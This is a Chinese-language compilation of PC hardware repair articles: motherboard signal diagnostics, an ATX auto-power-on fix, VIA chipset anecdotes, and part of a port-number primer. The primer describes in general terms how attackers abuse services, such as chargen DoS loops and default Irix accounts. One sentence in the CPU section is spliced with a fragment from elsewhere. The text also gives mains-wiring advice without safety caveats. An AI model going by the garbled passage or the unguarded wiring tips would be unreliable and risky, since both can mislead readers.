内核由旁边的一个小管子供给.
8． 有些SCLK 信号不经过南桥,直接到CPU 脚和AGP.PCI
9．
电源插座（主板上）各电压通向哪里？掌握RESET、CLK、READY、PG信号产生RESET、PG→时钟发生器→CPU（RESET）。主板上印制线曲曲折：是为了满足信号同步的需要。
１０．BIOS的22脚CS（片选）由CPU产生→北桥→南桥→BIOS的２２脚。
１１．若诊断卡跳Ｃ１－Ｃ６，Ｕ１－Ｕ６表示不读内存①首先看内存是否有短路，接触不良。②查内存的ＲＡＳ，ＣＡＳ，ＣＳ，ＶＣＣ。
１２．若不能触发，查灰线→经过电阻，电容→７４１４门电路→南桥→ＩＳＡＢ０２，ＰＣＩＤ８，ＣＰＵ。
１３．若橙线性３．３Ｖ对地适中多为ＢＧＡ故障①ＢＧＡ，②Ｉ／Ｏ芯片，③时钟发生器，④电源ＩＣ。
１４．ＤＢＳＹ（３７０ＣＰＵ上就有）→数据忙信号：拆下ＢＩＯＳ，插上ＣＰＵ，测若无波，北桥坏，前提是（ＣＬＫ，ＲＥＳＥＴ，ＶＣＣ）都具备。ＣＰＵ上的ＣＬＫ是时钟发生器经过北桥到ＣＰＵ座上的。
１５．新板故障多在①电源ＩＣ②Ｉ／Ｏ芯片③ＢＩＯＳ。旧板故障多在①南桥（ＦＸ，ＶＸ ）②ＢＩＯＳ③Ｉ／Ｏ芯片。
１６．不能显示①电源部分②时钟发生器③Ｉ／Ｏ芯片。
１７．ＩＤＥ不能检测→多是ＩＤＥ口旁边小排坏了。
１８．开机不显示→ＣＰＵ可工作（即ＰＯＳＴ显示到达２６）→ＢＩＯＳ坏（换）。
１９．ＰⅡ，ＰⅢ死机①主芯片散热不良②时钟发生器或晶振坏③ＣＰＵ供电不正常④ＣＰＵ座接触不良。
２０．电源插座上绿色线５Ｖ，一路到Ｉ／Ｏ芯片，一路经过门电路到南桥。
２１．待命电压由电源紫色线→电容，电阻→一路到Ｉ／Ｏ芯片，一路到南桥，一路到北桥。
注：待命电压５Ｖ，只要是电源插头插到主板上，北桥，南桥或Ｉ／Ｏ芯片就有５Ｖ电压，主板如果不触发它，南北桥不应有温度。
２２．Ｉ／Ｏ芯片也有几脚连接到北桥。
２３．ＣＰＵ发出ＣＳ（片选）信号→北桥→南桥→ＢＩＯＳ２２脚，当ＢＩＯＳ的２２脚收到ＣＳ信号后，２４脚就输出一个ＯＥ（允许输出）信号。
２４．检查ＲＥＳＥＴ复位信号故障时，不但要检测时钟信号产生电路，还要检测ＰＧ信号和ＲＣ电路。
２５．①内存二排二行１０脚ＣＳ片选是由北桥提供的。②ＢＩＯＳ２２脚上的ＣＳ产生过程是由ＣＰＵ→北桥→南桥→ＢＩＯＳ的２２脚。


ATX结构主板通电即开机故障的解决

《一键清理系统垃圾》

ATX结构主板通电即开机故障的解决

    最近有些朋友询问有些品牌的ATX主板比如磐英（EPOX）和华硕等在电源接通后有自动开机的现象，并担心对机器有不良的影响。现在我对这个问题做个详细的回答。

    我本人使用的是磐英的6VBA，使用的是693的芯片组，ATX结构，支持ACPI和STR。开始我也发现有这个问题，因为我用完机器以后就会把插座的电源开关也关闭掉。再次打开插座的电源的时候，有时机器就会自己启动了，根本不需要按下机器上的电源开关。通过我长时间的摸索，我找到了几个原因，基本能解决这个问题。

外部电源方面

    ATX结构的电源启动是靠检测一个电容的电平信号来启动的，在按下电源插座开关的时候，由于开关不能保证一次接通良好，所以会产生一个短暂的冲击电流。这时候可能就会引起ATX电源的误动作，使机器启动。

    另外如果在潮湿的环境下，长时间不使用机器，会让这个电容缓慢的放电，当电源接通的时候，瞬间的充电电流可能也会引起ATX电源误动作。

    这个问题的解决方法很简单，尽量不使用插座上的电源开关。我将电源插座的开关用电烙铁焊死，处于接通状态。换掉墙上的暗线插座，改成带一个开关的暗线插座，火线先进开关后进插座，用这个开关来控制。因为这个开关上带有弹簧装置，扳动它可以保证一次性的接触好。

主板的设置方面

    磐英的主板的、693、694等系列主板中，在BIOS里加入了一个独特的电源管理设计，由于说明书上并没有注明，很多朋友并没有注意到。就是可以管理来电时机器的状态。
可以设定为开机，关机和回到停电之前的状态，其默认是开机。

    在POWER MANAGEMENT SETUP中，有个PWRON AFTER PW-FAIL的设置项来设置这个功能，它有3个选项，分别为ON（开机）、OFF（关机）和FORMER-STS（回到断电之前的状态）。应该设置成OFF，这样在停电后突然来电就不会自己启动了。

    我就曾经吃过一次亏，有一次晚上停电之后，我没有把插座关掉就去睡觉了。第二天早上已经来电了，我去用机器，发现机器已经启动了，打开显示器一看，WINDOWS一直停留在登录页面下。我的电脑已经运转了一夜！

    不知道磐英公司为什么这样设置默认值，而且并没有在说明书上详细的说明，弄的不少人直到现在还以为自己的主板或电源有问题。


PC机主板常见故障分析和排除

《一键清理系统垃圾》

PC机主板常见故障分析和排除

    主板是整个PC机系统的关键部件，在PC机中起着至关重要的作用。CPU及总线控制逻辑、BIOS芯片读写控制、系统时钟发生器与时序控制电路、DMA传输与中断控制、内存及其读写控制、键盘控制逻辑、I/O总线插槽及某些外设控制逻辑都集成在主板上。因此，主板产生故障将会影响到整个PC机系统的工作。当一台PC机出现故障时，我们首先要使用插拔法、替换法、比较法来确认PC机中其它部件是否有故障，最后才将故障确定在主板上。由于目前主板上部件集成度越来越高，以及受芯片来源和检测设备的限制，当检测到PC机主板存在故障时，更多是更换主板，这样不仅处理速度快，而且可靠性高。
    PC机主板引起的常见故障现象有：开机加电显示器呈黑屏状态、扬声器无声响、键盘被封锁、硬盘驱动器不能引导等，但是就其故障的性质来说，可划分为以下两大类：一是关键性故障，二是非关键性故障，其中关键性故障又细分为电源故障、CPU故障、总线故障等。主板上的电源、CPU芯片、BIOS芯片、定时器芯片、数据收发逻辑电路、DMA控制器、中断控制器以及基本的64K内存和内存刷新电路是系统运行的关键部件。一旦这些部件出现故障，将使整个系统陷于瘫痪，在加电自检程序中，系统首先对这些部件进行检查，如果这些部件出错，就作为关键性故障。一般以初始化显示器子系统为界，在此以前出现的故障为关键性故障，这时屏幕上无显示，显示器呈黑屏状态，扬声器发出“嘟嘟”声响。如果出现关键性故障，PC机系统将不能继续引导。
#1　　一、电源故障
    PC机电源采用的都是无工频变压器四路开关稳压电源，电源功率在200W～250W之间，所有电源均带有过压和过载保护，若使用中发生直流过压和过载故障，一般电源会自动关闭，直至故障排除为止。开关电源可向主板提供±5V和±12V的直流电压，其中＋5V是向主板的各种板卡及键盘供电，＋12V是向软、硬盘驱动器和光驱等供电，－5V用于板卡上的锁相式数据分离电路，－12V用于为异步通信适配器提供的EIA接口电源。常见的PC机开关电源性能指标如下：＋5V应达到20A，－5V应达到0.5A，＋12V应达到9A，－12V应达到0.5A。
    当220V交流电压经过低通滤波器后，进入桥式整流电路，经整流滤波后得到300V的高压直流电，再经过逆变器变成20KHz的脉宽可调矩形方波直流电，在变压器的次级得到宽度可调的输出脉冲方波，再经过整流、滤波后，获得所需直流电压输出。下^04030401a^为开关电源工作原理简图。
    另外，PC机电源有一个特殊的输出信号，称为POWER GOOD（PG）信号。PG信号在电源开启后不是马上输出，而是经过一段时间（约100ms～500ms）的延时后才输出的，它是一个与TTL电平兼容的信号。它由各直流输出电压检测信号和交流输入电压失效信号逻辑与而获得，当电源正常工作时为高电平，当电源有故障时为低电平。
    开机加电后，PC机电源的常见故障有以下几种：
    1．直流变换器驱动电路中的功率开关管损坏，无输出电压。
    2．当电源的＋5V输出空载时，产生保护动作，＋12V轴流风扇转动一会儿就停止，无输出电压。
    3．±5V和±12V直流输出任何一路发生故障，无输出电压。
    4．整流二极管损坏或高压滤波电容损坏，造成输出直流电压偏低而且不稳定。
    5．当电压过高时，轻则烧断保险丝或限流热敏电阻，重则烧坏大功率管，造成电源无输出。当电压过低时，造成欠压，进入保护状态，电源无输出电压。
    6．PG信号无动作或PG信号延时时间不够，机器不能启动。
    根据笔者的经验，当电源发生故障时，比较常见的是电源的直流输出电压中的任何一路无输出或PG信号失效而引起主板无法正常工作。我们应该首先检查开关电源的小轴流风扇是否工作，如果不工作，检查给PC机供电的交流电源是否接好。否则，可能是电源内部原因，可用万用表测量主板上四种直流电源对地的阻值，看是否存在短路现象。如果没有短路，直接测试电源的PG信号是否正常，因为PG信号的建立比PC机直流输出端电压的建立要晚几百毫秒，如果PG信号的低电平持续时间不够或没有低电平时间，PC机将无法启动。如果PG信号一直为低电平，则PC机系统始终处于复位状态。这时PC机也出现黑屏、无声响等死机现象。当用逻辑笔测试PG信号时，发现有时有高电平到低电平的跳变，有时又总是低电平，则是PG信号延时时间不够，可以在电源的PG信号线与地线之间跨接一个100μF左右的电解电容。利用电容加电后自身的充电时间来产生一个PG信号延时，保证PG信号有足够的延时时间。如果存在短路现象，则表明电源内部结构有故障。由于PC机电源结构复杂，维修比较困难，需要一定的电工专业知识。所以当分析并确认是电源故障时，维修主板时建议更换新的PC机电源为好。
#1　　二、CPU故障
    排除电源故障后，仍出现黑屏，无声响等关键性故障现象，则应首先检查CPU是否工作，再检查BIOS芯片是否工作，最后检查CPU芯片本身。根据笔者的经验，由于CPU芯片本身的故障率比较低，因此，CPU的故障大多是CPU工作输入信号不正常造成的或BIOS芯片有故障引起的。
    CPU工作的基本输入信号有三个，一是系统复位信号RESET；二是系统时钟信号CLK；三是CPU就绪信号READY。对于RESET信号可以通过检测ISA插槽中的B02复位驱动信号是否具有一个正脉冲，如果没有则是系统复位故障，应重点检查复位信号产生电路，或PC信号和RC信号线路的逻辑关系等。接着测试产生RESET信号的时钟处理芯片的RESET输出端。若无RESET信号，再测试时钟处理芯片的PG信号输入端，正常开机时有一个TTL电平的跳变信号，否则是主机电源的故障。对于CLK信号可以通过检测ISA插槽中的B20系统时钟信号是否具有一个标准的TTL电平脉冲方波，有脉冲则说明CLK信号正常，反之CLK有故障，应重点检查时钟信号产生电路，传输线路及相关芯片的逻辑关系等。接着关机后用万用表测CPU的CLK引脚对地的阻值是否存在短路现象，若无短路，说明时钟脉冲发生器电路有故障；若短路，则检查传输线路及相关逻辑关系等。对于READY信号，可以在开机前将逻辑笔放在CPU的READY信号引脚上，然后开机观察，如果READY信号一直保持高电平状态，则说明CPU工作不正常，一直处于等待状态；若一直为低电平状态，则多为等待状态逻辑电路发生故障。
    如果CPU的三个输入信号正常，开机还是呈黑屏，而且无声响，就要考虑是否是BIOS芯片有故障，反复利用开机瞬间测试BIOS芯片的片选引脚CS，若发现是低电平，则说明正常，否则，BIOS芯片未被选中。接着测试BIOS芯片的允许信号输出引脚OE，若是低电平，则表示允许BIOS内部数据正常输出到数据总线上，否则是BIOS芯片本身损坏。排除B对于第一个方面，在各层次的总线中，任何一种类型的总线出现故障，CPU就不能在取IOS芯片本身故障的最好的方法是更换相同型号的芯片。
    如果开机后CPU能够选中BIOS，但仍呈黑屏状态，则要重点检查DMA控制器、中断控制器、定时器芯片等。它们是CPU的高级支持电路，发生故障时，同样会出现黑屏，无声响等现象。
    如果是CPU芯片本身损坏，我们只能更换新的CPU，而没有其它的好方法。
#1　　三、总线故障
    在排除CPU故障后，还是出现黑屏，无声响等关键性故障现象，则应该检查是否是总线故障。总线可分成CPU总线，存储器总线，I/O通道总线和外围接口总线四个层次。每个层次的总线又分为地址总线、控制总线、数据总线等三种。地址总线和控制总线上的信号是由执行总线操作的主设备产生的，CPU和DMA控制器都有权控制总线。数据总线是为各部件之间提供数据传送的通路。只有在控制总线和地址总线的作用下，数据总线才有意义。总线故障主要表现在三个方面：总线本身故障；总线控制权错误引起故障；系统总线故障。
    指令的总线周期中正确地读取指令码，从而使得以后的任何操作都失败。只有内存数据总线，I/O通道数据总线和局部数据总线三者内容保持一致，才能保证读取指令总线周期时CPU能够得到正确的指令。
    对于第二个方面，为了满足系统对多主控模块争用总线控制权的需要，在总线接口中一般配备了总线控制器模块。当CPU需要DMA控制器去完成控制功能时，才把控制权交给DMA控制器。此外，DMA还可以控制内存的刷新操作。如果这些总线主控器或相关电路发生错误也会引起总线故障。
    对于第三个方面，系统总线是PC机主板上信息交换的中心。CPU输出的地址信息经过地址缓冲器后输出到系统地址总线上，输出的数据信息经过数据缓冲器后输出到系统数据总线上。输出的指令经过指令缓冲器后输出到系统控制总线上。所以，影响系统总线的因素很多，如由局部总线故障、系统总线之间的芯片或外围接口总线芯片故障引起的。
    总线故障多以系统总线故障为主，当系统总线出现故障时，经常出现黑屏，无声响等关键性故障现象。CPU执行的任何周期只能靠READY信号低电平来结束工作，如果READY为高电平，则CPU自动插入等待状态，直到READY为低电平。因此我们可以让CPU在开机执行完第一个周期后不结束，这样CPU就可以保持输出的地址信号0FFFFFF0H一直有效，通过用逻辑笔来跟踪、测试这些CPU输出的有效信号，同时记录结果，与相同型号的正常主板的测试结果进行比较，找到有故障的芯片，来排除系统总线故障。
    考虑到目前PC机主板上都有ISA总线插槽，笔者常用测试ISA总线输出的地址信号，来排除系统总线故障。ISA总线插槽包括两个部分，一部分是62线ISA插槽，另一部分是36线ISA插槽，共98个引脚。
    正常情况下，加电后ISA插槽中的地址信号和数据信号均为脉冲信号，如果两者均无脉冲信号，则可能是CPU没有工作，若个别地址总线或数据总线为恒定电平或有脉冲信号，则是系统总线故障。一般情况是，若发现某一位或很少几位为恒定电平，可重新开机测试这些位在开机瞬间是否为恒定电平，若开机瞬间即为恒定电平，则是故障状态。若开机瞬间为脉冲，而后变为恒定电平则应测试其他信号，若发现八位以上出错状态，则应测试相应的总线驱动门控制信号。
    如果开机后，ISA插槽中的地址总线和数据总线出现过脉冲信号，随后又变成恒定电平，则说明CPU工作基本正常，可能是系统总线的故障。用逻辑笔在ISA插槽中逐位地测试地址总线信号和数据总线信号，如果发现某位或很少几位为恒定电平，则马上复位测试在开机瞬间是否为恒定电平。如果开机瞬间有一个以上的脉冲出现，则应首先测试其他信号。如果有某位信号在开机时为恒定电平，则是错误状态，应重点检查该信号的传输线路及与该信号有关的逻辑关系等。在不加电情况下，将ISA总线插槽中的62线I/O插槽中A10（IO CHARY）和B10（GND）信号短接，使CPU加电后仅执行一个总线周期就停止。这样CPU在执行第一条开机指令的第一个总线周期时，地址信号值为0FFFF0H，传输的路径是CPU→地址锁存器→总线驱动器芯片→BIOS。数据信号值是5BEAH。传输路径为BIOS→数据传送/接收器芯片→CPU。沿着这条路径，用逻辑笔逐级核对地址信号A0－A19是否为0FFFF0H，数据信号D0－D15是否为5BEA，存储器读信号（MEMR）是否为低电平，发现哪一级出错，就重点测试与该级有关的传输线路和相应芯片的逻辑关系。
    除了上面关键性故障表现的三个方面外，还有主板上的定时器、中断控制器、数据收发逻辑电路、DMA控制器以及基本的64KB内存和内存刷新电路等关键部件的故障。一旦这些部件出现故障，将使整个系统陷于瘫痪。
    根据笔者的经验，对于关键性故障，还可以根据PC机扬声器所发出的“嘟嘟”报警声的次数来判断故障的大致部位（见附表^04030401b^一、^04030401c^二），从而分析和排除关键性故障，根据这些信息仔细分析，查找故障原因，通过插拔法、比较法、替换法等排除故障。
#1　　四、非关键性故障
    POST程序检查完关键性部件无故障后，系统就具备了最基本的运行条件，可以对其它部件进行诊断和测试。与关键性故障相比，出现非关键性故障时不死机，屏幕上有提示，可允许系统继续启动。
    1．中断控制电路故障
    在PC中常用两块8259芯片级联组成16级中断电路模块，在BIOS测试过程中分别对主/从8259芯片的两个地址口进行读写操作。当CPU对主/从8259芯片进行读写操作时，其芯片的CS、RD、WR、A0引脚都应有脉冲信号。用逻辑笔测试当CS为低电平时，RD为低电平有效，表示可以读操作，WR为低电平有效，表示可以写操作，A0引脚为高电平有效，表示选择了I/O地址，则表明故障出现在8259模块电路上。否则，8259芯片本身损坏。当中断电路模块出现故障时，如果故障点影响到系统总线时，这时同样会出现黑屏、无声响等关键性故障现象。系统总线受影响大多是由于中断电路芯片8259的I/O引脚对地短路造成的，可以测试8259芯片的I/O引脚信号，来排除故障。
    如果确认中断控制器有故障，对于直接采用8259芯片的主板可以直接更换该芯片，或最好为更换主板。
    2．DMA电路故障
    在PC机中CPU和DMA都是系统的控制器，但DMA能够提供地址信号和控制信号。在BIOS测试过程中，如果发现DMA控制器故障，则在屏幕上给出提示信息。如果当软盘不能引导时，在排除软盘驱动器和软盘本身故障后，就需要测试DMA控制器，因为，软盘读写控制使用DMA通道2。如果DMA控制器工作正常，接着测试ISA总线插槽中的SA0－SA15引脚信号是否有脉冲，以及DMA控制器控制地址锁存器和页面寄存器等有关电路。DMA控制器有故障时，也可能会影响到内存的刷新，这时同样会出现黑屏，无声响等关键性故障现象。如果确认DMA控制器电路模块有故障，可以更换该芯片或相关芯片或更换主板。
    3．定时器电路故障
    定时器模块电路是由8253或8254定时器芯片组成的。在BIOS测试过程中，对8253内部的控制寄存器只进行写操作，对三个通道计数器进行读写操作，当测试到内部的寄存器有问题时，则在屏幕上给出提示信息，表示定时器模块有故障，然后允许BIOS测试继续运行。但是特殊情况下，有的内存的刷新请求信号（DRQO）是由8253的通道0发出的，如果该通道有故障，也可能造成黑屏，无声响等关键性故障现象。
    如果确认定时器电路模块有故障，可以更换该芯片或相应模块，或建议更换主板。
    4．键盘控制器模块故障
    键盘控制器基本上由一个8042芯片组成。在BIOS测试过程中，如果发现键盘控制器有故障，则在屏幕上给出提示信息，然后停止工作。如果更换键盘后故障依旧，则说明可能主板上8042芯片有故障。在开机时用逻辑笔测试8042芯片的CS、AD、RD、WR等引脚是否有脉冲信号，若有则测试8042芯片的RESET引脚，如果是先出现低电平信号并且保持了一段时间后上升为高电平，则表示复位正常，这时就可以确定是8042芯片本身的故障，否则测试相应模块。
    如果确认键盘控制器模块有故障，由于8042芯片为DIP封装，最简单的方法就是拆下来更换新的芯片。
    5．实时钟/日历和CMOS RAM模块电路故障
    主板的BIOS SETUP设置程序一般保存在CMOS RAM模块内。在BIOS测试过程中，发现当实时钟/日历电路模块出现故障时，一般会在屏幕上给出相应的提示信息，从而比较容易排除故障。比较常见的现象有：
    ①主板上的后备电池出现漏液，使电池功能无效，造成CMOS RAM中的参数丢失。须要更换新电池来解决。
    ②后备电池电压不足2V，造成CMOS RAM中的参数丢失。须要更换新电池来解决。
    ③实时钟/日历和CMOS RAM模块电路故障或本身芯片损坏，建议更换该芯片。
    6．内存控制模块电路故障
    主板中都采用内存条模块，在BIOS测试过程中，如果是第一个16KB内存出现故障，则出现黑屏、无声响等关键性故障现象。
    通过插拔法和替换找到损坏的内存条，排除故障。如果是内存插槽有故障，建议更换新主板。
    综上所述，PC机主板的故障分析和排除，不仅需要我们紧跟当前主板的制造和发展技术，而且还要熟悉和掌握PC机和主板的工作原理，不断总结实际工作中的经验，才能更快地提高水平。


VIA芯片主板使用经验两则

《一键清理系统垃圾》

VIA芯片主板使用经验两则

   在网上看了许多网友们的DIY心得，觉得他们DIYf过程中遇到的麻烦我也有遇到，现在应该把它写出来给大家分亨一下了，我这次写的是关于板卡的兼容性问题。说到主板的兼容性问题，当然INTEL是大家公认最好的，但是并不是每个人都用Intel芯片的，如果这样那AMD、VIA、SIS这些公司岂不是喝西北风了。而非INTEL芯片中绝大部分人可能会选择VIA了，因为它在非INTEL芯片阵营中又被公认为最好的。VIA主板除了功能丰富外，还有就是价格比较容易接受，用DIYER的话就是说：性价比高。因此我现在用的也是VIA芯片的主板，谁叫我没有钱去买INTEL的。不过作为一个DIYER是完全有理由去接受VIA的。

下面就让我叙述我在DIY VIA芯片主板过程中所遇到的麻烦。

第一块是硕泰克的65KV(VIA Apollo 133A)。买这块板的时候是694X人气最旺的时候，因为其它名牌的694X主板比较贵，所以在考虑成本的情况下我帮我的同学选择了这块板。刚刚开始的时候我的同学是用一块PCI显示卡的（手头紧，无办法啦）。过了不久之后，他有钱了，他叫我推荐一块500多块的显示卡给他，要求是几乎能玩现在所有的游戏。500多元真是不多不少的，选一块比较理想的显示卡真的是很难。经过几天的市场研究之后，我推荐他用"双敏电子"的小影霸（注意：不是新天下的）TNT2 M64（16MB显存）。当时，华硕、丽台的同芯片的都要700大元左右。这个小影霸的无疑是最超值的了。把买来的显卡装到机上，驱动程序安装顺利。然后就是测试显卡了。游戏当然是当时最流行的飞车3了。为什么不用飞车5呢？因为飞车5的画面真是做得太漂亮了，用9880也能玩出很好的画面。进入游戏，首先用软件加速，无问题，只不过画面较差。用硬件加速吧，这时问题来了，一进入游戏时画面就停（死机了）。reset后，还是出现这样的问题。怀疑游戏（D版的）本身有问题。借来正版的，重装还是死机。难道系统有问题，系统是刚刚装上的，无理由。电源吗？世纪之星的，不会差吧！对了，忘了打VIA四合一补丁。找来最新版的4.23版本。装上重新启动后，进入游戏还是死机。难道真的无办法了。把显示卡驱动程序卸了，重新装上四合一补丁。这次居然行了。难道四合一与显示卡驱动程序的安装也有先后吗？我专门做了一次实验果然如此。其它的694X主板上我没有做过实验，不过如果你用的是VIA的主板，我希望你还是按这个顺序来确保万无一失。

第二块就是ASUS K7V(VIA Apollo KX133)。机器同样是我另一位同学的。请先看机器的配置：　主板：ASUS K7V
CPU:K7 650
内存：kingmax 133(1.1版本）64MB
显卡：ASUS V3800(TNT2 PRO)16MB
OS：win98 第二版
其它PCI卡：帝盟s100声卡一块、杂牌rockell芯片Modem一块、顶星 realtek 8029(as)网卡一块。

某一天，同学来电告诉我，他的机器有问题了。我立刻赶到他家，机器症状表现为：刚刚进入WIN98的时候，开机音乐还没有放完，鼠标、键盘就完全没有了反应，屏幕停住了。首先想到的就是软件的故障，以安全模式进入WIN98，成功。接着用msconfig.exe去除所有的自启动程序（像office的osa.exe之类的），还有config.sys、autoexec.bat，重新启动故障依旧。难道系统有问题，但同学说他刚刚在windows界面下重装了win98一次。最后还是想到冲突的问题，像VIA这样的主板难免存在这样的问题。我把板上的PCI卡全拆了下来，只留下显卡。重新开机，成功了。说明真的是板卡中存在冲突。同学是个菜鸟，完全不知道VIA存在这样的问题，所以他VIA的四合一补丁肯定没有装。按照第一次的经验。先把显卡驱动程序卸了，然后再打上四合一补丁。最后就是把那些卡一块一块地装上去。

就要到尾声了，我认为如果你是一个只利用电脑玩下游戏、上下网，而完全不想动手的人，我建议你用intel芯片的主板（像BX等），这样就会免去你的许多麻烦。但是作为一个CFAN，我极力推荐用VIA的主板，因为没有经过那痛苦的经验又怎能体验出DIY的乐趣呢？


电脑端口基础知识(必读篇)

《一键清理系统垃圾》

电脑端口基础知识(必读篇)

--------------------------------------------------------------------------------
    电脑端口基础知识
端口可分为3大类：
1） 公认端口（Well Known Ports）：从0到1023，它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如：80端口实际上总是HTTP通讯。
2） 注册端口（Registered Ports）：从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从1024左右开始。
3） 动态和/或私有端口（Dynamic and/or Private Ports）：从49152到65535。理论上，不应为服务分配这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从32768开始。
    本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住：并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣，请参看本文的其它部分。
    0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口，当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描：使用IP地址为0.0.0.0，设置ACK位并在以太网层广播。
    1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户，如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。
    7 Echo 你能看到许多人们搜索Fraggle放大器时，发送到x.x.x.0和x.x.x.255的信息。
    常见的一种DoS攻击是echo循环（echo-loop），攻击者伪造从一个机器发送到另一个机器的UDP数据包，而两个机器分别以它们最快的方式回应这些数据包。（参见Chargen）
    另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”，它与DNS的这一端口连接以确定最近的路由。
    Harvest/squid cache将从3130端口发送UDP echo：“如果将cache的source_ping on选项打开，它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。
    11 sysstat 这是一种UNIX服务，它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全，如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似
    再说一遍：ICMP没有端口，ICMP port 11通常是ICMP type=11
    19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时，会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。
    21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。
    22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式，许多使用RSAREF库的版本有不少漏洞。（建议在其它端口运行ssh）
    还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。
    UDP（而不是TCP）与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632（十六进制的0x1600）位交换后是0x0016（使进制的22）。
    23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术，入侵者会找到密码。
    25 smtp 攻击者（spammer）寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭，他们需要拨号连接到高带宽的e-mail服务器上，将简单的信息传递到不同的地址。SMTP服务器（尤其是sendmail）是进入系统的最常用方法之一，因为它们必须完整的暴露于Internet且邮件的路由是复杂的（暴露+复杂=弱点）。
    53 DNS Hacker或crackers可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其它通讯。因此防火墙常常过滤或记录53端口。
    需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种方法穿透防火墙。
    67和68 Bootp和DHCP UDP上的Bootp/DHCP：通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”（man-in-middle）攻击。客户端向68端口（bootps）广播请求配置，服务器向67端口（bootpc）广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。
    69 TFTP(UDP) 许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件，如密码文件。它们也可用于向系统写入文件。
    79 finger Hacker用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其它机器finger扫描。
    98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root，信任局域网，在/tmp下建立Internet可访问的文件，LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器，许多典型的HTTP漏洞可能存在（缓冲区溢出，历遍目录等）
    109 POP2 并不象POP3那样有名，但许多服务器同时提供两种服务（向后兼容）。在同一个服务器上POP3的漏洞在POP2中同样存在。
    110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个（这意味着Hacker可以在真正登陆前进入系统）。成功登陆后还有其它缓冲区溢出错误。
    111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有：rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。
    记住一定要记录线路中的daemon, IDS, 或sniffer，你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。
    113 Ident auth 这是一个许多机器上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息（会被Hacker利用）。但是它可作为许多服务的记录器，尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，你将会看到许多这个端口的连接请求。记住，如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST，着将回停止这一缓慢的连接。
    119 NNTP news 新闻组传输协议，承载USENET通讯。当你链接到诸如：news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子，访问被限制的新闻组服务器，匿名发帖或发送spam。
    135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时，它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如：这个机器上运行Exchange Server吗？是什么版本？
    这个端口除了被用来查询服务（如使用epdump）还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。
    137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息，请仔细阅读文章后面的NetBIOS一节
    139 NetBIOS　File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。
